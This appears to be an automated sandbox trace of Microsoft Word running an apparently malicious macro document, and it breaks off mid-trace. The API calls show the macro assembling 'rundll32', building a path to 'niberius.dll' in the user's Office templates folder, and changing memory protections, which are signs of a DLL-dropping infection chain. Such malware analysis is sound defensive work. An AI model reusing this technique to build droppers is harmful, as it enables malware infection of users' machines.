# Flog Txt Version 1 # Analyzer Version: 4.2.2 # Analyzer Build Date: Jun 7 2021 05:43:29 # Log Creation Date: 07.07.2021 02:46:09.759 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe" page_root = "0x40f85000" os_pid = "0xdd0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x36c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e32c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xe48 Thread: id = 2 os_tid = 0xe3c Thread: id = 3 os_tid = 0xe38 Thread: id = 4 os_tid = 0xe34 Thread: id = 5 os_tid = 0xe30 Thread: id = 6 os_tid = 0xe2c Thread: id = 7 os_tid = 0xe28 Thread: id = 8 os_tid = 0xe24 Thread: id = 9 os_tid = 0xe20 Thread: id = 10 os_tid = 0xe1c Thread: id = 11 os_tid = 0xe18 Thread: id = 12 os_tid = 0xe14 Thread: id = 13 os_tid = 0xe0c Thread: id = 14 os_tid = 0xdd4 [0112.443] DispCallFunc (pvInstance=0x7dea0b4, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x1881b0) returned 0x0 [0112.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x753211d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1880c0 | out: lpThreadId=0x1880c0*=0xe88) returned 0x834 [0112.449] PeekMessageA (in: lpMsg=0x1880a0, hWnd=0x1033a, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x1880a0) returned 0 [0112.455] GetActiveWindow () returned 0x102fc [0112.455] CRetailMalloc_Realloc () returned 0x6d10758 [0112.455] CRetailMalloc_Alloc () returned 0x7e462b8 [0112.455] CRetailMalloc_Realloc () returned 0x7cf1200 [0112.456] _mbscpy_s (in: _Dst=0x1879d0, _DstSizeInBytes=0x3, _Src=0x467285e | out: _Dst=0x1879d0) returned 0x0 [0112.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d2792, cbMultiByte=20, lpWideCharStr=0x187884, cchWideChar=21 | out: lpWideCharStr="wdUserTemplatesPath") returned 20 [0112.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x467287e, cbMultiByte=20, lpWideCharStr=0x1878e4, cchWideChar=21 | out: lpWideCharStr="wdUserTemplatesPath") returned 20 [0112.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x467287e, cbMultiByte=20, lpWideCharStr=0x1878e4, cchWideChar=21 | out: lpWideCharStr="wdUserTemplatesPath") returned 20 [0112.458] CRetailMalloc_Realloc () returned 0x7db8ee0 [0112.458] CRetailMalloc_Realloc () returned 0x7e037d8 [0112.459] realloc (_Block=0x0, _Size=0x100) returned 0xa4e1c80 [0112.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10bc4, cbMultiByte=1, lpWideCharStr=0x5a10200, cchWideChar=4 | out: lpWideCharStr="r") returned 1 [0112.459] CRetailMalloc_Realloc () returned 0x7d6c148 [0112.459] CRetailMalloc_Realloc () returned 0x7d90c38 [0112.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d27c2, cbMultiByte=8, lpWideCharStr=0x187884, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0112.460] CRetailMalloc_Realloc () returned 0x7c9a270 [0112.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46728ae, cbMultiByte=8, lpWideCharStr=0x1878e4, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0112.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46728ae, cbMultiByte=8, lpWideCharStr=0x1878e4, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0112.465] CRetailMalloc_Realloc () returned 0x7df0480 [0112.466] CRetailMalloc_Realloc () returned 0x7c8ad28 [0112.466] CRetailMalloc_Realloc () returned 0x7c9a378 [0112.481] CRetailMalloc_Alloc () returned 0x7c8a818 [0112.481] CRetailMalloc_Realloc () returned 0x7e17148 [0112.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46728ae, cbMultiByte=8, lpWideCharStr=0x1878a4, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0112.481] CRetailMalloc_Realloc () returned 0x6d3b9d0 [0112.483] CRetailMalloc_Realloc () returned 0x7d6c370 [0112.483] CRetailMalloc_Alloc () returned 0x7c8a7e8 [0112.483] CRetailMalloc_Realloc () returned 0x7e0d3e0 [0112.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46728d2, cbMultiByte=16, lpWideCharStr=0x1878bc, cchWideChar=17 | out: lpWideCharStr="DefaultFilePath") returned 16 [0112.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10bf0, cbMultiByte=1, lpWideCharStr=0x5a10ae4, cchWideChar=4 | out: lpWideCharStr="u") returned 1 [0112.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10bf8, cbMultiByte=1, lpWideCharStr=0x5a10b5c, cchWideChar=4 | out: lpWideCharStr="n") returned 1 [0112.486] CRetailMalloc_Realloc () returned 0x6d3bfe8 [0112.487] CRetailMalloc_Alloc () returned 0x7cfa258 [0112.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10c10, cbMultiByte=13, lpWideCharStr=0x5a11268, cchWideChar=28 | out: lpWideCharStr="\\niberius.dll") returned 13 [0112.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d08be, cbMultiByte=4, lpWideCharStr=0x187884, cchWideChar=5 | out: lpWideCharStr="Dir") returned 4 [0112.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46708be, cbMultiByte=4, lpWideCharStr=0x1878e4, cchWideChar=5 | out: lpWideCharStr="Dir") returned 4 [0112.513] CRetailMalloc_Realloc () returned 0x6d10f68 [0112.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10c2a, cbMultiByte=0, lpWideCharStr=0x5a11538, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0112.514] realloc (_Block=0x0, _Size=0x60) returned 0xa4e1d88 [0112.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d27e6, cbMultiByte=4, lpWideCharStr=0x187884, cchWideChar=5 | out: lpWideCharStr="nam") returned 4 [0112.515] CRetailMalloc_Alloc () returned 0x7dea118 [0112.515] CRetailMalloc_Alloc () returned 0x7e17148 [0112.515] CRetailMalloc_Alloc () returned 0x7e171b8 [0112.516] CRetailMalloc_Alloc () returned 0x7e1cd50 [0112.516] CRetailMalloc_Alloc () returned 0x7e1cf78 [0112.516] CRetailMalloc_Alloc () returned 0x7e1d1a0 [0112.516] CRetailMalloc_Alloc () returned 0x7e46ac8 [0112.516] CRetailMalloc_Free () returned 0x1 [0112.516] CRetailMalloc_Alloc () returned 0x7e46ac8 [0112.516] CRetailMalloc_Free () returned 0x1 [0112.516] CRetailMalloc_Alloc () returned 0x7e46ac8 [0112.516] CRetailMalloc_Free () returned 0x1 [0112.516] CRetailMalloc_Realloc () returned 0x7deff10 [0112.516] CRetailMalloc_Realloc () returned 0x7c8a7b8 [0112.516] CRetailMalloc_Alloc () returned 0x7cf1220 [0112.516] CRetailMalloc_Alloc () returned 0x7cf1240 [0112.517] CRetailMalloc_Alloc () returned 0x7cf1260 [0112.517] CRetailMalloc_Alloc () returned 0x7cf1280 [0112.517] CRetailMalloc_Alloc () returned 0x7df0330 [0112.517] CRetailMalloc_Alloc () returned 0x7db4f50 [0112.517] CRetailMalloc_Alloc () returned 0x7db4fc0 [0112.517] CRetailMalloc_Alloc () returned 0x7db4ff8 [0112.557] CRetailMalloc_Alloc () returned 0x7c8d278 [0112.557] CRetailMalloc_Alloc () returned 0x7df0288 [0112.557] CRetailMalloc_Realloc () returned 0x7c98830 [0112.557] CRetailMalloc_Free () returned 0xffff0001 [0112.557] CRetailMalloc_Realloc () returned 0x7df0288 [0112.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10c64, cbMultiByte=2, lpWideCharStr=0x5a11d8e, cchWideChar=6 | out: lpWideCharStr="l3") returned 2 [0112.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10c6a, cbMultiByte=1, lpWideCharStr=0x5a11dd0, cchWideChar=4 | out: lpWideCharStr="2") returned 1 [0112.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d2806, cbMultiByte=13, lpWideCharStr=0x187884, cchWideChar=14 | out: lpWideCharStr="vbNullString") returned 13 [0112.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672982, cbMultiByte=13, lpWideCharStr=0x1878e4, cchWideChar=14 | out: lpWideCharStr="vbNullString") returned 13 [0112.559] CRetailMalloc_Realloc () returned 0x6d11370 [0112.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10c9e, cbMultiByte=11, lpWideCharStr=0x5a121a0, cchWideChar=24 | out: lpWideCharStr="\\niberius.d") returned 11 [0112.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10cb0, cbMultiByte=14, lpWideCharStr=0x5a1222c, cchWideChar=30 | out: lpWideCharStr="ll,UBISYAYMQSE") returned 14 [0112.561] CRetailMalloc_Alloc () returned 0x7e189b0 [0112.561] CRetailMalloc_Realloc () returned 0x7e1d3c8 [0112.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7555ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0112.562] CRetailMalloc_Alloc () returned 0x7e1d5f0 [0112.562] CRetailMalloc_Realloc () returned 0x7e462b8 [0112.562] CRetailMalloc_Free () returned 0xf20001 [0112.562] GetCurrentProcess () returned 0xffffffff [0112.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d4, dwSize=0x14) returned 1 [0112.562] VirtualProtect (in: lpAddress=0x7d6a5d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1877ac | out: lpflOldProtect=0x1877ac*=0x40) returned 1 [0112.563] GetCurrentProcess () returned 0xffffffff [0112.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d5, dwSize=0x2) returned 1 [0112.563] GetCurrentProcess () returned 0xffffffff [0112.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f4, dwSize=0x14) returned 1 [0112.563] VirtualProtect (in: lpAddress=0x7d6a5f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1877ac | out: lpflOldProtect=0x1877ac*=0x40) returned 1 [0112.564] GetCurrentProcess () returned 0xffffffff [0112.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f5, dwSize=0x2) returned 1 [0112.564] GetCurrentProcess () returned 0xffffffff [0112.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a614, dwSize=0x14) returned 1 [0112.564] VirtualProtect (in: lpAddress=0x7d6a614, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1877ac | out: lpflOldProtect=0x1877ac*=0x40) returned 1 [0112.564] GetCurrentProcess () returned 0xffffffff [0112.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a615, dwSize=0x2) returned 1 [0112.564] GetCurrentProcess () returned 0xffffffff [0112.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a634, dwSize=0x14) returned 1 [0112.564] VirtualProtect (in: lpAddress=0x7d6a634, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1877ac | out: lpflOldProtect=0x1877ac*=0x40) returned 1 [0112.565] GetCurrentProcess () returned 0xffffffff [0112.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a635, dwSize=0x2) returned 1 [0112.565] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.593] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0112.593] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x75320000 [0112.594] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.595] GetProcAddress (hModule=0x75320000, lpProcName=0x285) returned 0x75355599 [0112.595] GetCurrentProcess () returned 0xffffffff [0112.595] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6bafc, dwSize=0x19) returned 1 [0112.595] VirtualProtect (in: lpAddress=0x7d6bafc, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x1877c8 | out: lpflOldProtect=0x1877c8*=0x4) returned 1 [0112.596] free (_Block=0x0) [0112.596] free (_Block=0x0) [0112.596] free (_Block=0x0) [0112.597] CRetailMalloc_Alloc () returned 0x7df0300 [0112.597] CRetailMalloc_Free () returned 0x1820201 [0112.597] CRetailMalloc_Alloc () returned 0x7c8d638 [0112.597] CRetailMalloc_Alloc () returned 0x7df0300 [0112.597] CRetailMalloc_Free () returned 0x1820201 [0112.597] CRetailMalloc_Alloc () returned 0x7c8d1b8 [0112.597] CRetailMalloc_Alloc () returned 0x7df0300 [0112.597] CRetailMalloc_Free () returned 0x1820201 [0112.597] CRetailMalloc_Alloc () returned 0x7c8d0f8 [0112.597] CRetailMalloc_Alloc () returned 0x7cf12a0 [0112.597] CRetailMalloc_Free () returned 0xe3a0001 [0112.597] CRetailMalloc_Alloc () returned 0x7c8cff8 [0112.597] GetCurrentProcess () returned 0xffffffff [0112.597] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cda2, dwSize=0xc) returned 1 [0112.597] VirtualProtect (in: lpAddress=0x7e1cda2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187b54 | out: lpflOldProtect=0x187b54*=0x4) returned 1 [0112.598] GetCurrentProcess () returned 0xffffffff [0112.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdb6, dwSize=0xc) returned 1 [0112.598] VirtualProtect (in: lpAddress=0x7e1cdb6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187b54 | out: lpflOldProtect=0x187b54*=0x40) returned 1 [0112.598] GetCurrentProcess () returned 0xffffffff [0112.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdca, dwSize=0xc) returned 1 [0112.598] VirtualProtect (in: lpAddress=0x7e1cdca, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187b54 | out: lpflOldProtect=0x187b54*=0x40) returned 1 [0112.599] GetCurrentProcess () returned 0xffffffff [0112.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdde, dwSize=0xc) returned 1 [0112.599] VirtualProtect (in: lpAddress=0x7e1cdde, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187b54 | out: lpflOldProtect=0x187b54*=0x40) returned 1 [0112.599] free (_Block=0x0) [0112.599] free (_Block=0x0) [0112.599] free (_Block=0x0) [0112.599] GetAsyncKeyState (vKey=3) returned 0 [0112.612] VarBstrCat (in: bstrLeft="r", bstrRight="u", pbstrResult=0x188078 | out: pbstrResult=0x188078) returned 0x0 [0112.612] VarBstrCat (in: bstrLeft="ru", bstrRight="n", pbstrResult=0x188078 | out: pbstrResult=0x188078) returned 0x0 [0112.613] CRetailMalloc_Alloc () returned 0x7e46448 [0112.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d10cf8, cbMultiByte=2, lpWideCharStr=0x5a10134, cchWideChar=6 | out: lpWideCharStr="dl") returned 2 [0112.613] CRetailMalloc_Realloc () returned 0x7e46c58 [0112.613] CRetailMalloc_Realloc () returned 0x7e46448 [0112.613] CRetailMalloc_Free () returned 0xa20001 [0112.613] GetCurrentProcess () returned 0xffffffff [0112.613] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d4, dwSize=0x14) returned 1 [0112.614] VirtualProtect (in: lpAddress=0x7d6a5d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.614] GetCurrentProcess () returned 0xffffffff [0112.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d5, dwSize=0x2) returned 1 [0112.614] GetCurrentProcess () returned 0xffffffff [0112.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f4, dwSize=0x14) returned 1 [0112.614] VirtualProtect (in: lpAddress=0x7d6a5f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.615] GetCurrentProcess () returned 0xffffffff [0112.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f5, dwSize=0x2) returned 1 [0112.615] GetCurrentProcess () returned 0xffffffff [0112.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a614, dwSize=0x14) returned 1 [0112.615] VirtualProtect (in: lpAddress=0x7d6a614, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.615] GetCurrentProcess () returned 0xffffffff [0112.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a615, dwSize=0x2) returned 1 [0112.615] GetCurrentProcess () returned 0xffffffff [0112.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a634, dwSize=0x14) returned 1 [0112.615] VirtualProtect (in: lpAddress=0x7d6a634, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.616] GetCurrentProcess () returned 0xffffffff [0112.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a635, dwSize=0x2) returned 1 [0112.617] GetAsyncKeyState (vKey=3) returned 0 [0112.617] VarBstrCat (in: bstrLeft="run", bstrRight="dl", pbstrResult=0x187fe4 | out: pbstrResult=0x187fe4) returned 0x0 [0112.617] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates", bstrRight="\\niberius.dll", pbstrResult=0x188074 | out: pbstrResult=0x188074) returned 0x0 [0112.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", cchWideChar=-1, lpMultiByteStr=0x187ab8, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", lpUsedDefaultChar=0x0) returned 68 [0112.617] _fullpath (in: _FullPath=0x187e44, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll" [0112.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", cchWideChar=-1, lpMultiByteStr=0x187f4c, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", lpUsedDefaultChar=0x0) returned 68 [0112.691] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\templates\\niberius.dll", _FindData=0x187c24 | out: _FindData=0x187c24) returned 0xffffffff [0112.691] _errno () returned 0x77207d8 [0112.798] GetUserDefaultLCID () returned 0x409 [0112.798] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x409, dwFlags=0x30001) returned 0x1 [0112.798] GetAsyncKeyState (vKey=3) returned 0 [0112.798] CRetailMalloc_Alloc () returned 0x7e46f60 [0112.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d2832, cbMultiByte=7, lpWideCharStr=0x1877a4, cchWideChar=8 | out: lpWideCharStr="wdLine") returned 7 [0112.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672c22, cbMultiByte=7, lpWideCharStr=0x187804, cchWideChar=8 | out: lpWideCharStr="wdLine") returned 7 [0112.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672c22, cbMultiByte=7, lpWideCharStr=0x187804, cchWideChar=8 | out: lpWideCharStr="wdLine") returned 7 [0112.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d2856, cbMultiByte=10, lpWideCharStr=0x1877a4, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0112.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672bae, cbMultiByte=10, lpWideCharStr=0x187804, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0112.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672bae, cbMultiByte=10, lpWideCharStr=0x187804, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0112.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672bae, cbMultiByte=10, lpWideCharStr=0x1877c4, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0112.802] CRetailMalloc_Realloc () returned 0x7c94118 [0112.802] CRetailMalloc_Realloc () returned 0x7ded2c8 [0112.805] CRetailMalloc_Alloc () returned 0x7c8ad28 [0112.805] CRetailMalloc_Realloc () returned 0x7da8838 [0112.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672bd6, cbMultiByte=9, lpWideCharStr=0x1877dc, cchWideChar=10 | out: lpWideCharStr="MoveDown") returned 9 [0112.807] CRetailMalloc_Realloc () returned 0x7d9d090 [0112.807] CRetailMalloc_Realloc () returned 0x7e190b0 [0112.807] CRetailMalloc_Alloc () returned 0x7d60460 [0112.807] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x5, _Src=0x4672bfe | out: _Dst=0x7d60460) returned 0x0 [0112.807] SysStringByteLen (bstr="Unit") returned 0x8 [0112.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit \x03¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.808] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0112.808] CRetailMalloc_Free () returned 0xda0001 [0112.808] CRetailMalloc_Alloc () returned 0x7d60460 [0112.808] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x6, _Src=0x4672c46 | out: _Dst=0x7d60460) returned 0x0 [0112.808] SysStringByteLen (bstr="Unit") returned 0x8 [0112.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit \x03¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.808] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0112.808] SysStringByteLen (bstr="Count") returned 0xa [0112.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x187700, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄ7u$w\x18", lpUsedDefaultChar=0x0) returned 5 [0112.808] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0112.808] CRetailMalloc_Free () returned 0xda0001 [0112.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d287e, cbMultiByte=12, lpWideCharStr=0x1877a4, cchWideChar=13 | out: lpWideCharStr="wdCharacter") returned 12 [0112.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672c92, cbMultiByte=12, lpWideCharStr=0x187804, cchWideChar=13 | out: lpWideCharStr="wdCharacter") returned 12 [0112.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672c92, cbMultiByte=12, lpWideCharStr=0x187804, cchWideChar=13 | out: lpWideCharStr="wdCharacter") returned 12 [0112.810] CRetailMalloc_Realloc () returned 0x7df4d50 [0112.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672c6a, cbMultiByte=10, lpWideCharStr=0x1877dc, cchWideChar=11 | out: lpWideCharStr="MoveRight") returned 10 [0112.812] CRetailMalloc_Alloc () returned 0x7d60460 [0112.812] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x5, _Src=0x4672bfe | out: _Dst=0x7d60460) returned 0x0 [0112.812] SysStringByteLen (bstr="Unit") returned 0x8 [0112.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit@\x10¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.813] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0112.813] CRetailMalloc_Free () returned 0xda0001 [0112.813] CRetailMalloc_Alloc () returned 0x7d60460 [0112.813] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x6, _Src=0x4672c46 | out: _Dst=0x7d60460) returned 0x0 [0112.813] SysStringByteLen (bstr="Unit") returned 0x8 [0112.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit@\x10¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.813] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0112.813] SysStringByteLen (bstr="Count") returned 0xa [0112.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x187700, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄ7u$w\x18", lpUsedDefaultChar=0x0) returned 5 [0112.813] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0112.813] CRetailMalloc_Free () returned 0xda0001 [0112.816] CRetailMalloc_Alloc () returned 0x7d60460 [0112.816] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x5, _Src=0x4672bfe | out: _Dst=0x7d60460) returned 0x0 [0112.816] SysStringByteLen (bstr="Unit") returned 0x8 [0112.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unità\x1c¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.816] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0112.816] CRetailMalloc_Free () returned 0xda0001 [0112.816] 